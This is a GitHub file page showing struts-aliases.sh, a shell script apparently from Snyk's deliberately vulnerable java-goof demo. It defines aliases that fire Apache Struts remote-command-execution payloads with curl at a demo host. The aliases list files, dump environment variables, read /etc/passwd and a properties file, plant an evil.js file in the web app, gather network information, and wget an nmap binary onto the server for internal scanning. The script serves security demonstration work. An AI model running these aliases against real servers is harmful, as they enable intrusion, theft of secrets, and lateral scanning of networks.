forked from snyk-labs/java-goof
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathstruts-aliases.sh
More file actions
35 lines (24 loc) · 1.9 KB
/
struts-aliases.sh
File metadata and controls
35 lines (24 loc) · 1.9 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
if [ -z "$JAVA_GOOF_HOST" ]; then
export JAVA_GOOF_HOST=java-goof.herokuapp.com
export JAVA_GOOF_URL=https://$JAVA_GOOF_HOST
fi
export JAVA_GOOF_DEBUG=-v
alias struts_base_command="echo \$EXP_MESSAGE'\n\n' &| cat struts-exploit-headers.txt| sed 's/COMMAND/'\$EXP_COMMAND'/' | xargs curl --http1.0 \$JAVA_GOOF_DEBUG $JAVA_GOOF_URL -H"
# Check if struts is there
alias struts0="nmap -p 80 --script http-vuln-struts-detection.nse $JAVA_GOOF_HOST"
# List files (simple)
alias struts1="export EXP_MESSAGE='Getting list of files...'; export EXP_COMMAND='ls -l'; struts_base_command"
# Get env
alias struts2="export EXP_MESSAGE='Getting environment info...'; export EXP_COMMAND='env'; struts_base_command"
# Get passwd
alias struts3="export EXP_MESSAGE='Getting password hash file...'; export EXP_COMMAND='cat \/etc\/passwd'; struts_base_command"
# List files - deep
alias struts4="export EXP_MESSAGE='Getting full list of files...'; export EXP_COMMAND='find .'; struts_base_command"
# Show a sensitive file
alias struts5="export EXP_MESSAGE='Showing sensitive properties file...'; export EXP_COMMAND='cat .\/target\/tomcat.*\/webapps\/expanded\/WEB-INF\/classes\/struts.properties'; struts_base_command"
# Create a file *********(make sure JAVA_GOOF_TOMCAT_PID is set to the right PID)******
alias struts6="export EXP_MESSAGE='Create a file at $JAVA_GOOF_URL/static/js/evil.js...'; export export EXP_COMMAND='echo MUHAHAHAHAHAHAHA > .\/target\/tomcat.'\$JAVA_GOOF_TOMCAT_PID'\/webapps\/expanded\/static\/js\/evil.js'; struts_base_command"
# Getting IP Info
alias struts7="export EXP_MESSAGE='Gathering internal network information...'; export export EXP_COMMAND='ip addr show'; struts_base_command"
# Uploading nmap to do port scanning
alias struts8="export EXP_MESSAGE='Uploading nmap...'; export export EXP_COMMAND='wget https:\/\/github.com\/andrew-d\/static-binaries\/raw\/master\/binaries\/linux\/x86_64\/nmap'; struts_base_command"